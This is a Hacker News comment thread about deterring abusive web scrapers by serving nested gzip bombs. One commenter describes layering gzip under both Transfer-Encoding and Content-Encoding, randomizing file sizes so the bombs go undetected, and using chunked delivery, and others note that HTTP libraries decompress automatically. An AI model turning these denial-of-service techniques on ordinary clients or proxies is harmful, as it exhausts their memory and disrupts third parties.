Interesting. What does number 5 do? Also, how do gzip bombs works, does it autom...

cookiengineer · on Oct 24, 2024

> Interesting. What does number 5 do?

LLMs that are implemented in a manner like this to offer web scraping capabilities usually try to replace web scraper interaction with the website in a programmable manner. There's bunch of different wordings of prompts, of course, depending on the service. But the idea is that you as a being-scraped-to-death server learn to know what people are scraping your website for in regards to the keywords. This way you at least learn something about the reason why you are being scraped, and can manage/adapt accordingly on your website's structure and sitemap.

> how do gzip bombs works, does it automatically extract to the 20gb or the bot has to initiate the extraction?

The point behind it is that it's unlikely that script kiddies wrote their own HTTP parser that detects gzip bombs, and are reusing a tech stack or library that's made for the task at hand, e.g. python's libsoup to parse content, or go's net/http, or php's curl bindings etc.

A nested gzip bomb has the effect that it targets both the client and the proxy in between, whereas the proxy (targeted via Transfer-Encoding) has to unpack around ~2ish GB of memory until it can process the request, and parse the content to serve it to its client. The client (targeted via Content-Encoding) has to unpack ~20GB of gzip into memory before it can process the content, realizing that it's basically only null bytes.

The idea is that a script kiddie's scraper script won't account for this, and in the process DDoS the proxy, which in return will block the client for violations of ToS of that web scraping / residential IP range provider.

The awesome part behind gzip is that the size of the final container / gzip bomb is varying, meaning that the null bytes length can just be increased by say, 10GB + 1 byte, for example, and make it undetectable again. In my case I have just 100 different ~100kB files laying around on the filesystem that I serve in a randomized manner and that I serve directly from filesystem cache to not need CPU time for the generation.

You can actually go further and use Transfer-Encoding: chunked in other languages that allow parallelization via processes, goroutines or threads, and have nested nested nested gzip bombs with various byte sizes so they're undetectable until concated together on the other side :)

yjftsjthsd-h · on Oct 24, 2024

Yes, it requires the client to try and extract the archive; https://en.wikipedia.org/wiki/Zip_bomb is the generic description.

brazzy · on Oct 24, 2024

What archive? The idea was to use Transfer-Encoding: gzip, which means the compression is a transparent part of the HTTP request which the client HTTP library will automatically try to extract.

happymellon · on Oct 24, 2024

Unless I misunderstood, there was a gzip transfer encoded gzip.

The transfer-encoding means that the proxy has to decompress a 200kb request into a 2Gb response to the client, and the client will receive a 2Gb file that will expand to 20Gb.

Small VM gets knocked offline and the proxy gets grumpy with the client for large file transfers.

cookiengineer · on Oct 24, 2024

> Unless I misunderstood, there was a gzip transfer encoded gzip.

Yes, correct. A gzip bomb inside a gzip bomb that contains only null bytes, because it's much larger on the client side when unpacked.

A "normal" gzip bomb that would only leverage "Content-Encoding: gzip" or only "Transfer-Encoding: gzip" isn't really good as for compression ratio, because the sent file is in the megabytes range (I think it was around 4MBish when I tried with gzip -9?). I don't wanna send megabytes in response to clients, because that would be a potential DoS.

edit: also note the sibling comment here: https://news.ycombinator.com/item?id=41923635#41936586

yjftsjthsd-h · on Oct 24, 2024

I'm using "archive" as a generic term for gzip/zip/etc.

But that's a good point; I'd not considered that if you compress the HTTP response it'll almost certainly get automatically extracted which "detonates" the (g)zip bomb.

notpushkin · on Oct 24, 2024

Most HTTP libraries would happily extract the result for you. [citation needed]

throwaway2037 · on Oct 24, 2024

Java class java.net.http.HttpClient

Python package requests

Whatever is the default these days in C#

Honestly, I have never used a modern HTTP client library that does not automatically decompress.

I guess libCurl might be a case where you need to add an option to force decompress.